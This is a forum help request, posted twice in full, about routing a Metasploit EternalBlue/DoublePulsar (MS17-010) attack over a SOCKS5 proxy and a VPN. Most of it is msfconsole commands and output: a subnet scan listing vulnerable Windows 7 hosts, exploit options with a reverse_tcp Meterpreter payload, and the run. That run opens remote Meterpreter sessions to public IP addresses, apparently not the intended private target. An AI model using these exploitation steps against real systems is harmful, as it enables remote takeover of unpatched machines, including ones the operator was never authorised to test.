staggerlee
2020-01-23, 10:45
Hi all,
I am trying to run some personal ms17_101 pen testing, over a socks5 proxy which is port forwarded over a (VPN).
The primary issue I am trying to resolve is getting eternalblue data to traverse the socks proxy using "set ReverseAllowProxy true", it may be a case where is it not even supported.
The socks setup itself does work, I am able to run the setup on Windows and successfully tunnel (IP range scan) through the tunnel using Proxify.
It looks like the route is attempting to use the public IP address of the sock proxy and/or target machine, rather than the loopback socks path.
Below, I have added some out the output and examples of the config/method I am attempting. This is my first attempt a this.
A couple of things to note:
I have removed the public IP addresses from the output.
I have attempted setting PROCESSINJECT = lsass.exe and also TARGETARCHITECTURE = x64 .... These gave the same results as posted.
10.7.0.62 is the private address of tun0/vpn
port 8484 is open through the vpn via port forwarding. It is not in use prior to running.
Kali Version - 2020.1
Kali Installation - Virtubox VM , running installed version.
Any suggestions are appreciated.
Thanks
=[ metasploit v5.0.70-dev ]
+ -- --=[ 1961 exploits - 1091 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > setg Proxies socks5:127.0.0.1:57366
Proxies => socks5:127.0.0.1:57366
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.2.1/24
rhosts => 192.168.2.1/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 64
threads => 64
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit -j
Auxiliary module running as background job 0.
msf5 auxiliary(scanner/smb/smb_ms17_010) >
192.168.2.1/24:445 - Scanned 34 of 256 hosts (13% complete)
192.168.2.1/24:445 - Scanned 60 of 256 hosts (23% complete)
[+] 192.168.2.103:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.106:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
----------
---EXAMPLE of detected hosts---
----------
----------
----------
----------
msf5 exploit(windows/smb/eternalblue_doublepulsar) > use exploit/windows/smb/eternalblue_doublepulsar
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
Exploit running as background job 1.
Exploit completed, but no session was created.
[-] 192.168.2.103:445 - Exploit failed: RuntimeError TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour.
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set ReverseAllowProxy true
ReverseAllowProxy => true
----------
---EXAMPLE of adding setting ReverseAllowProxy true---
----------
----------
----------
----------
sf5 exploit(windows/smb/eternalblue_doublepulsar) > options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOSTS 192.168.2.103 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.7.0.62 yes The listen address (an interface may be specified)
LPORT 8484 yes The listen port
Exploit target:
Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)
msf5 exploit(windows/smb/eternalblue_doublepulsar) >
----------
---EXAMPLE of set options---
----------
----------
----------
----------
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
Exploit running as background job 0.
Exploit completed, but no session was created.
Started reverse TCP handler on 10.7.0.62:8484
msf5 exploit(windows/smb/eternalblue_doublepulsar) >
192.168.2.103:445 - Generating Eternalblue XML data
192.168.2.103:445 - Generating Doublepulsar XML data
192.168.2.103:445 - Generating payload DLL for Doublepulsar
192.168.2.103:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
192.168.2.103:445 - Launching Eternalblue...
Sending stage (180291 bytes) to 45.x.x.x
Meterpreter session 1 opened (10.7.0.62:8484 -> 45.x.x.x:52873) at 2020-01-23 09:59:22 +0000
Sending stage (180291 bytes) to 45.x.x.x
Meterpreter session 2 opened (10.7.0.62:8484 -> 45.x.x.x:52872) at 2020-01-23 09:59:24 +0000
Sending stage (180291 bytes) to 115.x.x.x
192.168.2.103 - Meterpreter session 2 closed. Reason: Died
Meterpreter session 3 opened (10.7.0.62:8484 -> 115.x.x.x:51837) at 2020-01-23 09:59:25 +0000
Sending stage (180291 bytes) to 45.x.x.x
192.168.2.103 - Meterpreter session 3 closed. Reason: Died
Meterpreter session 4 opened (10.7.0.62:8484 -> 45.x.x.x:52874) at 2020-01-23 09:59:27 +0000
Sending stage (180291 bytes) to 115.x.x.x
192.168.2.103 - Meterpreter session 4 closed. Reason: Died
Meterpreter session 5 opened (10.7.0.62:8484 -> 115.x.x.x:51838) at 2020-01-23 09:59:29 +0000
Sending stage (180291 bytes) to 45.x.x.x
192.168.2.103 - Meterpreter session 5 closed. Reason: Died
Meterpreter session 6 opened (10.7.0.62:8484 -> 45.x.x.x:52876) at 2020-01-23 09:59:30 +0000
Sending stage (180291 bytes) to 115.x.x.x
192.168.2.103 - Meterpreter session 6 closed. Reason: Died
Meterpreter session 7 opened (10.7.0.62:8484 -> 115.x.x.x:51839) at 2020-01-23 09:59:31 +0000
I am trying to run some personal ms17_101 pen testing, over a socks5 proxy which is port forwarded over a (VPN).
The primary issue I am trying to resolve is getting eternalblue data to traverse the socks proxy using "set ReverseAllowProxy true", it may be a case where is it not even supported.
The socks setup itself does work, I am able to run the setup on Windows and successfully tunnel (IP range scan) through the tunnel using Proxify.
It looks like the route is attempting to use the public IP address of the sock proxy and/or target machine, rather than the loopback socks path.
Below, I have added some out the output and examples of the config/method I am attempting. This is my first attempt a this.
A couple of things to note:
I have removed the public IP addresses from the output.
I have attempted setting PROCESSINJECT = lsass.exe and also TARGETARCHITECTURE = x64 .... These gave the same results as posted.
10.7.0.62 is the private address of tun0/vpn
port 8484 is open through the vpn via port forwarding. It is not in use prior to running.
Kali Version - 2020.1
Kali Installation - Virtubox VM , running installed version.
Any suggestions are appreciated.
Thanks
=[ metasploit v5.0.70-dev ]
+ -- --=[ 1961 exploits - 1091 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > setg Proxies socks5:127.0.0.1:57366
Proxies => socks5:127.0.0.1:57366
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.2.1/24
rhosts => 192.168.2.1/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 64
threads => 64
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit -j
Auxiliary module running as background job 0.
msf5 auxiliary(scanner/smb/smb_ms17_010) >
192.168.2.1/24:445 - Scanned 34 of 256 hosts (13% complete)
192.168.2.1/24:445 - Scanned 60 of 256 hosts (23% complete)
[+] 192.168.2.103:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.106:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
----------
---EXAMPLE of detected hosts---
----------
----------
----------
----------
msf5 exploit(windows/smb/eternalblue_doublepulsar) > use exploit/windows/smb/eternalblue_doublepulsar
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
Exploit running as background job 1.
Exploit completed, but no session was created.
[-] 192.168.2.103:445 - Exploit failed: RuntimeError TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour.
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set ReverseAllowProxy true
ReverseAllowProxy => true
----------
---EXAMPLE of adding setting ReverseAllowProxy true---
----------
----------
----------
----------
sf5 exploit(windows/smb/eternalblue_doublepulsar) > options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOSTS 192.168.2.103 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.7.0.62 yes The listen address (an interface may be specified)
LPORT 8484 yes The listen port
Exploit target:
Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)
msf5 exploit(windows/smb/eternalblue_doublepulsar) >
----------
---EXAMPLE of set options---
----------
----------
----------
----------
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
Exploit running as background job 0.
Exploit completed, but no session was created.
Started reverse TCP handler on 10.7.0.62:8484
msf5 exploit(windows/smb/eternalblue_doublepulsar) >
192.168.2.103:445 - Generating Eternalblue XML data
192.168.2.103:445 - Generating Doublepulsar XML data
192.168.2.103:445 - Generating payload DLL for Doublepulsar
192.168.2.103:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
192.168.2.103:445 - Launching Eternalblue...
Sending stage (180291 bytes) to 45.x.x.x
Meterpreter session 1 opened (10.7.0.62:8484 -> 45.x.x.x:52873) at 2020-01-23 09:59:22 +0000
Sending stage (180291 bytes) to 45.x.x.x
Meterpreter session 2 opened (10.7.0.62:8484 -> 45.x.x.x:52872) at 2020-01-23 09:59:24 +0000
Sending stage (180291 bytes) to 115.x.x.x
192.168.2.103 - Meterpreter session 2 closed. Reason: Died
Meterpreter session 3 opened (10.7.0.62:8484 -> 115.x.x.x:51837) at 2020-01-23 09:59:25 +0000
Sending stage (180291 bytes) to 45.x.x.x
192.168.2.103 - Meterpreter session 3 closed. Reason: Died
Meterpreter session 4 opened (10.7.0.62:8484 -> 45.x.x.x:52874) at 2020-01-23 09:59:27 +0000
Sending stage (180291 bytes) to 115.x.x.x
192.168.2.103 - Meterpreter session 4 closed. Reason: Died
Meterpreter session 5 opened (10.7.0.62:8484 -> 115.x.x.x:51838) at 2020-01-23 09:59:29 +0000
Sending stage (180291 bytes) to 45.x.x.x
192.168.2.103 - Meterpreter session 5 closed. Reason: Died
Meterpreter session 6 opened (10.7.0.62:8484 -> 45.x.x.x:52876) at 2020-01-23 09:59:30 +0000
Sending stage (180291 bytes) to 115.x.x.x
192.168.2.103 - Meterpreter session 6 closed. Reason: Died
Meterpreter session 7 opened (10.7.0.62:8484 -> 115.x.x.x:51839) at 2020-01-23 09:59:31 +0000